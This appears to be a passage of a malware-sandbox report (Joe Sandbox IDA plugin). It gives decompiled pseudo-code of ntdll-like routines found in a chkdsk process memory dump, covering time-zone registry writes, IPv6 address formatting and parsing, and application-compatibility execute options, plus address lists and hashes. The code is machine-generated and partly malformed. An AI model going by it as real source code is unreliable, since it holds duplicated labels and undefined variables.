											__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E0242810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E0238F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                          0x02428231
                                          0x02428235
                                          0x0242823a
                                          0x02428245
                                          0x0242824b
                                          0x0242825c
                                          0x02428262
                                          0x02428263
                                          0x02428266
                                          0x02428268
                                          0x00000000
                                          0x0242826a
                                          0x02428270
                                          0x02428275
                                          0x02428277
                                          0x02428295
                                          0x02428297
                                          0x0242838d
                                          0x02428391
                                          0x024283a9
                                          0x024283ab
                                          0x024283ad
                                          0x024283b6
                                          0x024283b9
                                          0x00000000
                                          0x024283b9
                                          0x0242829d
                                          0x0242829d
                                          0x024282b6
                                          0x024282b8
                                          0x00000000
                                          0x024282be
                                          0x024282c0
                                          0x024282d5
                                          0x024282d7
                                          0x00000000
                                          0x024282dd
                                          0x024282f3
                                          0x024282f5
                                          0x00000000
                                          0x024282fb
                                          0x02428317
                                          0x02428319
                                          0x00000000
                                          0x0242831b
                                          0x02428332
                                          0x02428334
                                          0x00000000
                                          0x02428336
                                          0x0242834f
                                          0x02428351
                                          0x00000000
                                          0x02428353
                                          0x02428353
                                          0x0242835a
                                          0x00000000
                                          0x0242835c
                                          0x02428378
                                          0x0242837a
                                          0x0242837c
                                          0x02428385
                                          0x02428388
                                          0x024283bc
                                          0x024283cf
                                          0x024283cf
                                          0x0242837c
                                          0x0242835a
                                          0x02428351
                                          0x02428334
                                          0x02428319
                                          0x024282f5
                                          0x024282d7
                                          0x024282b8
                                          0x024283d4
                                          0x024283d9
                                          0x024283d9
                                          0x02428277
                                          0x0242824d
                                          0x0242824d
                                          0x0242824d
                                          0x0242824d
                                          0x024283df

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: _wcsnlen
                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                          • API String ID: 3628947076-1387797911
                                          • Opcode ID: 836e7d717090ab8025fe6f534f1ff6b2080d1a4d2dbb5b23a5caf739062a0c78
                                          • Instruction ID: f0b0aca8a373f69d03cc30532742fe920f664d1d974a326b3720d9c8ddbdd126
                                          • Opcode Fuzzy Hash: 836e7d717090ab8025fe6f534f1ff6b2080d1a4d2dbb5b23a5caf739062a0c78
                                          • Instruction Fuzzy Hash: 7E419471240238BAFB129AA3CD81FEFB76D9F04744F504127FA05D9190D7B1EA588BB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023D13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E023D13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E023C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2392926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E023C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2399cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E023C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E023C7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E023C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E023C7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                          0x023d13d5
                                          0x023d13d9
                                          0x023d13dc
                                          0x023d13de
                                          0x023d13e1
                                          0x023d13e8
                                          0x023d13ee
                                          0x023fe8fd
                                          0x00000000
                                          0x023fe921
                                          0x023fe921
                                          0x023fe928
                                          0x023fe982
                                          0x023fe98a
                                          0x00000000
                                          0x023fe99a
                                          0x023fe99e
                                          0x023fe9a3
                                          0x023fe9a8
                                          0x023fe9b9
                                          0x023fe978
                                          0x00000000
                                          0x023fe978
                                          0x023fe98a
                                          0x023fe92a
                                          0x023fe931
                                          0x023fe944
                                          0x023fe944
                                          0x023fe950
                                          0x023fe954
                                          0x023fe959
                                          0x023fe95e
                                          0x023fe963
                                          0x023fe970
                                          0x00000000
                                          0x023fe975
                                          0x023fe93b
                                          0x023fe980
                                          0x00000000
                                          0x023fe980
                                          0x023fe942
                                          0x023fe94b
                                          0x00000000
                                          0x023fe94b
                                          0x00000000
                                          0x023fe942
                                          0x023d13f4
                                          0x023d13f4
                                          0x023d13f9
                                          0x023d13fc
                                          0x023d13ff
                                          0x023d1406
                                          0x023fe9cc
                                          0x023fe9d2
                                          0x023fe9d2
                                          0x023fe9cc
                                          0x023d140c
                                          0x023d1411
                                          0x023d1431
                                          0x023d143a
                                          0x023d143c
                                          0x023d143f
                                          0x023d143f
                                          0x023d1442
                                          0x023d1447
                                          0x023d14a8
                                          0x023d14ac
                                          0x023fe9e2
                                          0x023fe9e7
                                          0x023fe9ec
                                          0x023fea05
                                          0x023fea05
                                          0x00000000
                                          0x023d1449
                                          0x00000000
                                          0x023d1449
                                          0x023d144c
                                          0x023d1459
                                          0x023d1462
                                          0x023d1469
                                          0x023d146a
                                          0x023d1470
                                          0x023d1473
                                          0x023d1476
                                          0x023d1476
                                          0x023d1490
                                          0x023d1495
                                          0x023d138e
                                          0x023d1390
                                          0x023d1397
                                          0x023d1398
                                          0x023d1399
                                          0x023d13a1
                                          0x023d13a4
                                          0x023d13a4
                                          0x023d1498
                                          0x023d149c
                                          0x023d149f
                                          0x023d14a2
                                          0x00000000
                                          0x00000000
                                          0x023d14a4
                                          0x00000000
                                          0x023d14a4
                                          0x023d1413
                                          0x023d1415
                                          0x023d1416
                                          0x023d1419
                                          0x023d141c
                                          0x023d1422
                                          0x023d13b7
                                          0x023d13bc
                                          0x023d13bf
                                          0x023d13bf
                                          0x023d13c2
                                          0x023d1424
                                          0x023d1424
                                          0x023d1424
                                          0x023d1427
                                          0x023d142b
                                          0x023d142c
                                          0x023d142c
                                          0x023d142c
                                          0x00000000
                                          0x023d141c
                                          0x023d1411

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 89435fddfa545b7862a9d3adc0564e9d5f7af5f0b66704f7e3829b98bf929920
                                          • Instruction ID: c2b0a28e7b65d2240265ed281e116424fb07b4ef4c7d3c1211102ee333cd488d
                                          • Opcode Fuzzy Hash: 89435fddfa545b7862a9d3adc0564e9d5f7af5f0b66704f7e3829b98bf929920
                                          • Instruction Fuzzy Hash: C36127B2E00655ABDF34DFA9D8809BFBBBAEF85300754C12EE9DA47541D334A640CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023C7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E023C7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2472088; // 0x76ee1647
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E023C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E023E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0239DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2474218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E023E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E023A0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E023E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E023A8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E023E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0240E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E023E3F92();
					_t38 = 1;
					L2:
					return E0239E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                          0x023c7f08
                                          0x023c7f0f
                                          0x023c7f12
                                          0x023c7f1b
                                          0x023c7f31
                                          0x023e3ead
                                          0x023e3eb4
                                          0x00000000
                                          0x00000000
                                          0x023e3eba
                                          0x023e3ecd
                                          0x023e3ed2
                                          0x023e3ee1
                                          0x023e3ee7
                                          0x023e3eec
                                          0x023e3f12
                                          0x023e3f18
                                          0x023e3f1a
                                          0x00000000
                                          0x00000000
                                          0x023e3f20
                                          0x023e3f26
                                          0x023e3f28
                                          0x00000000
                                          0x00000000
                                          0x023e3f2e
                                          0x023e3f30
                                          0x00000000
                                          0x00000000
                                          0x023e3f3a
                                          0x023e3f3b
                                          0x023e3f53
                                          0x023e3f64
                                          0x023e3f69
                                          0x023e3f6c
                                          0x023e3f6d
                                          0x023e3f6f
                                          0x023ee304
                                          0x023ee30f
                                          0x023ee315
                                          0x023ee31e
                                          0x023ee321
                                          0x023ee327
                                          0x023ee329
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023ee32f
                                          0x023ee32f
                                          0x023ee337
                                          0x023ee33a
                                          0x023ee33b
                                          0x023ee33d
                                          0x023ee33f
                                          0x023ee341
                                          0x023ee341
                                          0x023ee34e
                                          0x023ee353
                                          0x023ee358
                                          0x023ee35d
                                          0x023ee35f
                                          0x00000000
                                          0x00000000
                                          0x023ee365
                                          0x023ee365
                                          0x023ee368
                                          0x023ee36e
                                          0x00000000
                                          0x00000000
                                          0x023ee374
                                          0x023ee32f
                                          0x023e3f75
                                          0x023e3f7a
                                          0x023e3f7c
                                          0x023e3f7e
                                          0x023e3f86
                                          0x023c7f39
                                          0x023c7f47
                                          0x023c7f47
                                          0x023c7f37
                                          0x023c7f37
                                          0x00000000

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 023E3F12
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 023E3F4A
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 023EE2FB
                                          • ExecuteOptions, xrefs: 023E3F04
                                          • Execute=1, xrefs: 023E3F5E
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 023E3EC4
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 023E3F75
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 023EE345
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: fccc9b55a97f6f55f0e02afb84a0c32fed81ddd5aaebd427d0e12a52ebb64a41
                                          • Instruction ID: ed16691e0b9c24cb53d4e1790f3e6f74a71fc370293d2b728b313adaa8f7c7a7
                                          • Opcode Fuzzy Hash: fccc9b55a97f6f55f0e02afb84a0c32fed81ddd5aaebd427d0e12a52ebb64a41
                                          • Instruction Fuzzy Hash: 7941CA7268071C7AEF30DAA4DCC5FEBB3BDAB15704F1004A9E906E6181E770DA498F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023D0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E023D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E023A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0239DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E023D0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E023D0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E023D06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E023D06BA(_t135, _t178) == 0 || E023D0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E023D0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E023D0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E023D06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E023D06BA(_t124, _t142) == 0 || E023D0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                          0x023d0b21
                                          0x023d0b24
                                          0x023d0b27
                                          0x023d0b2a
                                          0x023d0b2d
                                          0x023d0b30
                                          0x023d0b33
                                          0x023d0b36
                                          0x023d0b39
                                          0x023d0b3e
                                          0x023d0c65
                                          0x023d0c68
                                          0x023d0c6a
                                          0x023d0c6f
                                          0x023feb42
                                          0x00000000
                                          0x00000000
                                          0x023feb48
                                          0x023feb48
                                          0x023d0c75
                                          0x023d0c7a
                                          0x023feb54
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023feb5a
                                          0x023d0c80
                                          0x023d0c84
                                          0x023feb98
                                          0x00000000
                                          0x00000000
                                          0x023feba6
                                          0x023d0cb8
                                          0x023d0cba
                                          0x023d0cd3
                                          0x023d0cda
                                          0x023d0ce4
                                          0x023d0ce9
                                          0x00000000
                                          0x023d0cec
                                          0x023d0c8c
                                          0x023feb63
                                          0x00000000
                                          0x00000000
                                          0x023feb70
                                          0x023feb75
                                          0x023feb7d
                                          0x00000000
                                          0x00000000
                                          0x023feb8c
                                          0x00000000
                                          0x023feb8c
                                          0x023d0c96
                                          0x00000000
                                          0x00000000
                                          0x023d0ca2
                                          0x023d0cac
                                          0x023d0cb4
                                          0x00000000
                                          0x00000000
                                          0x023d0b44
                                          0x023d0b47
                                          0x023d0b49
                                          0x00000000
                                          0x00000000
                                          0x023d0b4f
                                          0x023d0b50
                                          0x00000000
                                          0x00000000
                                          0x023d0b56
                                          0x023d0b62
                                          0x023d0b7c
                                          0x023d0bac
                                          0x023d0a0f
                                          0x023feaaa
                                          0x00000000
                                          0x023feac4
                                          0x023feac4
                                          0x023d0bd0
                                          0x023d0bd0
                                          0x023d0bd4
                                          0x023d0bd9
                                          0x00000000
                                          0x00000000
                                          0x023d0bdb
                                          0x023d0be0
                                          0x023feb0e
                                          0x023d0a1a
                                          0x00000000
                                          0x023d0a1a
                                          0x023feb1a
                                          0x023feb1f
                                          0x023feb27
                                          0x00000000
                                          0x00000000
                                          0x023feb36
                                          0x00000000
                                          0x023feb36
                                          0x023d0bea
                                          0x00000000
                                          0x00000000
                                          0x023d0bf6
                                          0x023d0c00
                                          0x023d0c03
                                          0x023d0c0b
                                          0x00000000
                                          0x023d0c0b
                                          0x023feaaa
                                          0x00000000
                                          0x023d0a15
                                          0x023d0bb6
                                          0x00000000
                                          0x023d0bc6
                                          0x023d0bc6
                                          0x023d0bcb
                                          0x023d0c15
                                          0x00000000
                                          0x00000000
                                          0x023d0c1d
                                          0x023d0c20
                                          0x023d0c21
                                          0x023d0c24
                                          0x023d0c24
                                          0x023d0c26
                                          0x00000000
                                          0x023d0c26
                                          0x023d0bcd
                                          0x00000000
                                          0x023d0bcd
                                          0x023d0b89
                                          0x023d0b89
                                          0x023d0b90
                                          0x00000000
                                          0x00000000
                                          0x023d0b96
                                          0x00000000
                                          0x023d0b96
                                          0x023d0a04
                                          0x023d0a04
                                          0x023d0b9a
                                          0x023d0b9a
                                          0x023d0b9b
                                          0x023d0b9f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023d0ba5
                                          0x023d0ac7
                                          0x023d0aca
                                          0x023feacf
                                          0x00000000
                                          0x023feade
                                          0x023feade
                                          0x023feae3
                                          0x00000000
                                          0x00000000
                                          0x023feaf3
                                          0x023feaf6
                                          0x023feaf7
                                          0x023feafe
                                          0x023feb01
                                          0x00000000
                                          0x023feb01
                                          0x023feacf
                                          0x023d0ad0
                                          0x023d0ad4
                                          0x00000000
                                          0x00000000
                                          0x023d0ada
                                          0x023d0ae6
                                          0x023d0c34
                                          0x00000000
                                          0x023d0c47
                                          0x023d0c49
                                          0x023d0c4a
                                          0x023d0c4e
                                          0x023d0c51
                                          0x023d0c54
                                          0x023d0c57
